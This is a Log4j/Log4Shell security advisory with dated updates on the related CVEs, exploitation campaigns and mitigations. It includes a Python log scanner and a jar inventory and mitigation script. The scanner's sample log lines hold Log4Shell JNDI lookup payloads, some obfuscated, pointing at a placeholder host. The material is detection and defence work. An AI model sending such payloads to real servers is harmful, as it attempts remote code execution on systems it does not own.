Summary
UPDATE, 31 January 2022
Researchers recently published a blog detailing suspected active exploitation of UniFi Network applications. The first observed successful exploitation was on 20 January 2022; a proof-of-concept (PoC) for this exploit was released on 24 December 2021.
These attacks are similar to those that the same researchers detailed targeting VMware Horizon servers by leveraging the Log4j vulnerability, CVE-2021-44228.
However, researchers note that these attacks are unique in that the command-and-control (C2) used was the same Cobalt Strike Beacon C2 used in the SolarWinds supply chain attack, and it has been attributed to TA505, also known as GRACEFUL SPIDER, a well-known financially motivated threat group.
UPDATE, 28 December 2021
A fifth vulnerability related to Log4j has recently been disclosed. CVE-2021-44832 is an RCE vulnerability with a moderate severity rating (CVSS: 6.6) and is due to the lack of additional controls on JNDI access in Log4j. This vulnerability affects all versions from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4.
Apache has released version 2.17.1 to remediate. Users are encouraged to update to this latest version after appropriate testing is completed.
UPDATE, 27 December 2021
CISA, along with other security organizations, recently released scanners to identify Log4j vulnerabilities. The open-source tool is derived from scanners created by other members of the security community and is designed to help organizations determine whether they have vulnerable web services affected by the critical Log4j vulnerabilities. This scanner is located in CISA's public GitHub repository and scans for two major Log4j vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046. CISA stated that this scanner also supports DNS callback for vulnerability discovery and validation.
UPDATE, 22 December 2021
Today the CISA, FBI, NSA, Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom's National Cyber Security Centre (NCSC-UK) released a joint alert to provide additional guidance on mitigating vulnerabilities pertaining to Apache's Log4j software library.
This alert expands on previously published guidance by "detailing steps that vendors and organizations with IT and/or cloud assets should take to reduce the risk posed by these vulnerabilities."
These steps include:
- Identifying assets affected by Log4Shell and other Log4j-related vulnerabilities
- Upgrading Log4j assets and affected products to the latest version as soon as patches are available, and remaining alert to vendor software updates
- Initiating hunt and incident response procedures to detect possible Log4Shell exploitation
This alert also provides additional guidance for affected organizations with operational technology (OT)/industrial control systems (ICS) assets.
UPDATE, 21 December 2021
It has recently been discovered that the Log4j vulnerability is now being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter.
Researchers state that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Successful execution allows installation of the Dridex Trojan or Meterpreter once the targeted device is identified as running Windows or Linux.
Dridex is known for targeting online banking users to steal their credentials. More recent variants of Dridex have additional capabilities such as conducting surveillance activities, uploading additional malware, and propagating to other devices.
Successful deployment of either Dridex or Meterpreter could allow attackers to deploy further payloads or remotely execute commands on an affected device.
UPDATE, 20 December 2021
Another vulnerability in Log4j has been identified. CVE-2021-45105, rated as high severity (CVSS: 7.5), could allow an attacker with control over Thread Context Map data to cause a denial-of-service (DoS) condition.
While not exploiting the same vulnerability as the initial Log4j vulnerability, CVE-2021-45105 abuses Thread Context Map lookups rather than the JNDI lookups to an LDAP server that, in Log4Shell, allow attackers to execute any code the server returns. This vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, but only appears to affect non-default configurations.
Apache released its newest update, 2.17.0, to mitigate the newest vulnerabilities.
UPDATE, 17 December 2021
New details regarding Log4j continue to emerge.
Two additional vulnerabilities affecting Log4j have been observed and detailed. As of the time of this writing, there are four vulnerabilities associated with Log4j (also known as LogJam and Log4Shell):
- CVE-2021-44228 is the original Log4j vulnerability, rated as critical (CVSS: 10.0)
- CVE-2021-45046 is a Denial of Service (DoS) vulnerability. Previously considered a low severity vulnerability (CVSS: 3.7), CVE-2021-45046 has recently been updated to critical (CVSS: 9.0)
- CVE-2021-4104 affects non-default configurations of Log4j 1.x instances and is considered a high severity vulnerability (CVSS: 8.1)
- CVE-2021-42550 is a vulnerability in the Logback logging framework, a successor to the Log4j 1.x library, and is rated as medium severity (CVSS: 6.6)
Researchers strongly recommend updating to version 2.16.0, and organizations are urged to continue to monitor Apache's Log4j advisory page for updates.
In addition, CISA today issued an emergency directive directing federal civilian executive branch (FCEB) agencies to address Log4j vulnerabilities.
While the CISA Emergency Directive applies directly to federal civilian executive branch agencies, it does demonstrate the level of attention CISA is placing on these vulnerabilities and their recommended mitigating actions. For additional details, see CISA's webpage Apache Log4j Vulnerability Guidance.
New studies also show that attackers, from cybercriminals (including newly identified Conti ransomware actors targeting VMware servers) to nation-state actors, have attempted to exploit Log4j vulnerabilities on almost half of global networks.
UPDATE, 15 December 2021
A second vulnerability in Log4j was recently discovered. Tracked as CVE-2021-45046 with a CVSS score of 3.7, this vulnerability affects all versions of Log4j through version 2.15.0.
Apache has released version 2.16.0 in response; it is now recommended that organizations apply the latest patch version, 2.16.0, as version 2.15.0 was deemed incomplete. Apache stated in this latest advisory that the incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack."
UPDATE, 14 December 2021
CISA states that it, along with partners, is tracking and responding to the active, widespread exploitation of this critical RCE vulnerability, thought to potentially affect millions of organizations and hundreds of millions of devices across a variety of enterprises and industries.
As a result, CISA created a website devoted to guidance related to the Log4j vulnerability. This website will be actively maintained with a community-sourced GitHub repository of publicly available information and vendor-supplied advisories.
Of note, Log4j is now being viewed as 'fully weaponized' and being actively exploited by what at least two security firms suggest are Chinese government hacking groups.
UPDATE, 13 December 2021
Additional details continue to roll in on the critical zero-day vulnerability affecting several versions of Apache's Log4j, CVE-2021-44228.
Over the weekend, researchers published a blog detailing their observations on how attackers are attempting to exploit this vulnerability, including variations in attack methods and obfuscation methods used in attempts to hide within 'normal' network traffic.
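The obfuscation just described is what makes a naive search for the literal string "jndi" in web logs miss exploit attempts. The following Python script is an added example, not code from the researchers cited or from Apache: it URL-decodes each log line, iteratively resolves the nested lookup forms most often used to hide the token (the lower/upper case-conversion lookups and the ":-" default-value syntax), and then reports the protocol and target of any JNDI lookup that remains. The access-log lines are constructed for the example and point at the reserved example.invalid domain; in practice you would feed it your own web-server or application logs.

```python
"""Flag Log4Shell-style JNDI lookups in log lines, after undoing the nested
lookup and URL-encoding tricks used to hide the literal 'jndi' token."""
import re
from urllib.parse import unquote

# Web-server access log lines constructed for this example (not real traffic);
# every lookup target points at the reserved example.invalid domain.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://example.invalid/b}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexample.invalid%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [11/Dec/2021:03:14:20 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# An innermost lookup: ${...} whose body contains no further '${' or '}'.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Once nesting is resolved, a JNDI lookup names a protocol (ldap, ldaps, rmi, dns, ...).
_JNDI_PATTERN = re.compile(r'jndi:\s*([a-z]+)://?([^}\s"]*)', re.IGNORECASE)


def _resolve_inner(body):
    """Evaluate one innermost lookup the way the default/case lookups would."""
    if ":-" in body:                      # ${anything:-default} -> default  (covers ${::-j})
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    key = name.strip().lower()
    if sep and key == "lower":           # ${lower:J} -> j
        return arg.lower()
    if sep and key == "upper":           # ${upper:j} -> J
        return arg.upper()
    return body                          # other lookups: keep their text, drop the ${} wrapper


def normalize_lookups(text, max_passes=10):
    """Repeatedly collapse innermost lookups until nothing changes (bounded for safety)."""
    for _ in range(max_passes):
        new_text = _INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookups(line):
    """Return [(scheme, target), ...] for every JNDI lookup hidden in one log line."""
    normalized = normalize_lookups(unquote(line))
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI_PATTERN.finditer(normalized)]


def scan_log(lines):
    """Return (line_number, scheme, target) for each suspicious line in an iterable of log lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        for scheme, target in find_jndi_lookups(line):
            hits.append((number, scheme, target))
    return hits


if __name__ == "__main__":
    for number, scheme, target in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme} -> {target}")
```

Matching only after normalization is the point: a rule that looks for "${jndi:" in the raw line sees none of the three suspicious lines above except the first, while an unresolved benign lookup such as ${date:yyyy} still produces no alert. Outbound LDAP/RMI connection attempts from application servers, which the mitigation section below recommends blocking, are the complementary network-side signal.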
Additional research shows that CVE-2021-44228 is being leveraged to form new botnets. Two have been identified – a Muhstik botnet and a Mirai botnet – both being used to target Linux devices.
In addition, coin miners are now attempting to exploit this vulnerability for their purposes.
In fact, mass scanning attempts aiming to deploy coin miners or malware for building botnets have been observed. This could be considered 'sophisticated activity,' potentially from an advanced persistent threat (APT) actor or a state-sponsored actor.
Again, Apache has released Log4j version 2.15, which contains a fix for this CVE. It is recommended to immediately upgrade to this version once appropriate testing has been completed in your environment.
Researchers recommend that, if your organization is unable to apply the patches, you mitigate this vulnerability as follows:
- For versions 2.0 and before 2.10, Apache recommends removing the JndiLookup class from the classpath by running:
  zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- For versions 2.10 and above, set the system property formatMsgNoLookups to true or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
- If you cannot do any of the above, you can block all outbound LDAP or RMI connections using Application Identity filters. Juniper SRX NG Firewall provides AppID signatures for both protocols.
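The first mitigation above, and the per-CVE version ranges given throughout this advisory (CVE-2021-44228: 2.0-beta9 to 2.14.1; CVE-2021-45046: through 2.15.0; CVE-2021-45105: 2.0-beta9 to 2.16; CVE-2021-44832: 2.0-alpha7 to 2.17.0 excluding 2.3.2 and 2.12.4), are the two things an administrator has to apply across every host. The Python script below is an added example, not code from Apache, CISA or any vendor cited here: it finds log4j-core jars under a directory, reads the version from the jar's own pom.properties, lists the CVEs whose stated range contains that version, and can rewrite a jar without JndiLookup.class, which is what the zip -q -d command does. The ranges are encoded exactly as this advisory states them; the 2.0-beta9 lower bound for CVE-2021-45046 is an assumption (the advisory gives only the upper bound), and the 2.3.x/2.12.x backport branches Apache maintains have fixed releases inside these ranges that the advisory text does not describe, so check them against Apache's security page. build_sample_jar() and demo() create a constructed stand-in jar for the demonstration; the .class entries are placeholder bytes, not real bytecode.

```python
"""Inventory log4j-core jars, classify their versions against the ranges this
advisory lists, and apply the 2.0-2.10 mitigation (drop JndiLookup.class)."""
import json
import os
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Affected ranges (inclusive) exactly as this advisory states them. The 2.0-beta9
# floor for CVE-2021-45046 is an assumption (only the upper bound is given), and
# Apache's 2.3.x / 2.12.x backport branches carry fixes these ranges do not express.
AFFECTED_RANGES = {
    "CVE-2021-44228": ("2.0-beta9", "2.14.1", ()),
    "CVE-2021-45046": ("2.0-beta9", "2.15.0", ()),
    "CVE-2021-45105": ("2.0-beta9", "2.16.0", ()),
    "CVE-2021-44832": ("2.0-alpha7", "2.17.0", ("2.3.2", "2.12.4")),
}
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # pre-releases sort below the final release (rank 3)

def parse_version(v):
    """Map '2.0-beta9' -> (2, 0, 0, 1, 9) so Log4j versions compare as plain tuples."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    major, minor, patch, pre, pre_n = m.groups()
    return (int(major), int(minor), int(patch or 0), _PRE_RANK.get(pre, 3), int(pre_n or 0))

def applicable_cves(version):
    """CVEs from AFFECTED_RANGES whose (inclusive) range contains the version."""
    v = parse_version(version)
    return [cve for cve, (lo, hi, excluded) in AFFECTED_RANGES.items()
            if parse_version(lo) <= v <= parse_version(hi)
            and all(v != parse_version(e) for e in excluded)]

def inspect_jar(jar_path):
    """Report version (from pom.properties), presence of JndiLookup.class and matching CVEs."""
    with zipfile.ZipFile(jar_path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = m.group(1).strip() if m else None
    return {
        "jar": str(jar_path),
        "version": version,
        "jndi_lookup_present": JNDI_CLASS in names,
        "cves": applicable_cves(version) if version else [],
    }

def find_log4j_jars(root):
    """Yield every log4j-core*.jar below root (shaded/fat jars need a deeper scan)."""
    return (p for p in Path(root).rglob("*.jar") if p.name.startswith("log4j-core"))

def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class, like `zip -q -d`. Returns True if removed."""
    jar_path = Path(jar_path)
    tmp = jar_path.with_name(jar_path.name + ".tmp")
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    if removed:
        os.replace(tmp, jar_path)  # atomic swap: a crash never leaves a half-written jar
    else:
        tmp.unlink()
    return removed

def build_sample_jar(directory, version="2.14.1"):
    """Constructed stand-in for log4j-core-<version>.jar; .class entries are placeholder bytes."""
    jar = Path(directory) / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(jar, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    return jar

def demo():
    """Scan a constructed sample jar, mitigate it, and return the (before, after) reports."""
    with tempfile.TemporaryDirectory() as tmpdir:
        build_sample_jar(tmpdir, "2.14.1")
        jar = next(find_log4j_jars(tmpdir))
        before = inspect_jar(jar)
        remove_jndi_lookup(jar)
        after = inspect_jar(jar)
    return before, after

if __name__ == "__main__":
    for report in demo():
        print(json.dumps(report, indent=2))
```

Point find_log4j_jars() at an application's lib directory to inventory real deployments; the version check tells you whether an upgrade to the release named in the matching update is still outstanding, and remove_jndi_lookup() is only the stop-gap for the 2.0 to 2.10 range where the formatMsgNoLookups property does not exist. Jars embedded inside other archives (WAR/EAR files, shaded jars) need an additional pass, since this scan only looks at jar files on disk.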
Some researchers also recommend web application firewalls (WAF), though these are not considered foolproof, as well as outbound egress filtering and allow listing.
Indicators of Compromise (IoCs) and additional mitigation recommendations are available at the research sites mentioned above. In addition, further details regarding known vulnerable software are available here, and details regarding exploitation detection are available here.
Original Content
Apache recently released a security advisory to address a vulnerability in its Log4j Java library, an open source logging utility that's used in countless apps, including those used by large enterprise organizations and cloud services.
A remote code execution (RCE) vulnerability that does not require authentication, CVE-2021-44228, dubbed Log4Shell or LogJam, affects Log4j versions 2.0-beta9 to 2.14.1. This vulnerability is considered critical and has been assigned a CVSS score of 10.0.
A remote attacker could exploit this vulnerability to take control of an affected system.
Researchers initially reported this vulnerability to Apache on November 24, indicating that CVE-2021-44228 also impacts default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.
A proof-of-concept (PoC) exploit was published on GitHub yesterday; threat actors immediately began scanning the internet for vulnerable hosts and networks.
Along with Apache and the US CISA, the New Zealand Computer Emergency Response Team (CERT NZ) issued a security advisory warning of active exploitation in the wild.
Further, other researchers believe that "Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come."
It is likely that many threat actors, including ransomware actors, will begin leveraging this vulnerability immediately.
Analysis
Affected Versions
This vulnerability impacts Log4j versions 2.0-beta9 to 2.14.1, as well as default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.
Potential Impact
Successful exploitation of this vulnerability could allow complete system takeover on vulnerable systems.
Recommendations
Apache released an update to address this vulnerability.
CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://logging.apache.org/log4j/2.x/security.html
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
https://protect-eu.mimecast.com/s/7LIkCWnxXIDKZWo5HxkFaf?domain=mail-archives.us.apache.org
https://github.com/tangxiaofeng7/apache-log4j-poc
https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/
https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
https://github.com/NCSC-NL/log4shell/tree/main/software
https://www.govinfosecurity.com/serious-log4j-security-flaw-race-underway-to-discern-scope-a-18107
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://www.zdnet.com/article/log4j-flaw-nearly-half-of-corporate-networks-have-been-targeted-by-attackers-trying-to-use-this-vulnerability/
https://nvd.nist.gov/vuln/detail/CVE-2021-42550
https://nvd.nist.gov/vuln/detail/CVE-2021-4104
https://www.cisa.gov/emergency-directive-22-02
https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/
https://nvd.nist.gov/vuln/detail/CVE-2021-45105
https://logging.apache.org/log4j/2.x/download.html
https://heimdalsecurity.com/blog/dridex-malware-installed-with-the-help-of-log4j-vulnerability/
https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
https://github.com/cisagov/log4j-scanner
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832
https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications
https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk
https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/